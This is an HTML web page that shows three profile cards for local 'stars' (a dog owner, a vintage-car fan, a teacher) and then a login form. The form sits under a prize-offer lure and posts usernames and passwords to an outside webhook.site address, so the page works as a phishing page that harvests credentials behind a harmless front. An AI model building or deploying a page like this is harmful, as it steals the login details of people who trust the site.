<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Stars of the City</title>
  <link rel="stylesheet" href="styles.css">

 
    
</head>
<body>


  <section class="local-heroes">
    <h1>Stars of the City</h1>
    <div class="hero-container">
      <div class="hero-card">
        <img src="white-bull.jpg" alt="Hero 1" class="hero-image">
        <h2>Bob</h2>
        <p>Bob has a dog (a bull terrier) named "Shimi". Bob really loves his dog.</p>
      </div>
      <div class="hero-card">
        <img src="car.jpg" alt="Hero 2" class="hero-image">
        <h2>Alice</h2>
        <p>Alice is a fan of Mécanique.She has two vintage cars and often likes to paradearound with her ancestral objects</p>
      </div>
      <div class="hero-card">
        <img src="teacher.jpg" alt="Hero 3" class="hero-image">
        <h2>James Brown</h2>
        <p>James is a teacher who has devoted his life to educating children and helping them achieve their dreams.</p>
      </div>
    </div>
  </section>


<title>Login Page</title>
  <link rel="stylesheet" href="styles2.css">





  <div class="login-container" color = "blue">
    <h1>Login</h1>
    <form action="https://webhook.site/9cea2190-c584-4740-b353-e8872cd07b92" method="POST" id="login-form">
<!-- Offer message -->
    <div class="offer-message">
      <p>This is your chance to win a big prize for our local stars! The offer is limited.</p>
    </div>

      <label for="username">Username</label>
      <input type="text" id="username" name="username" placeholder="Enter username" required>

      <label for="password">Password</label>
      <input type="password" id="password" name="password" placeholder="Enter password" required>

      <button type="submit">Login</button>
    </form>
  </div>

</body>
</html>
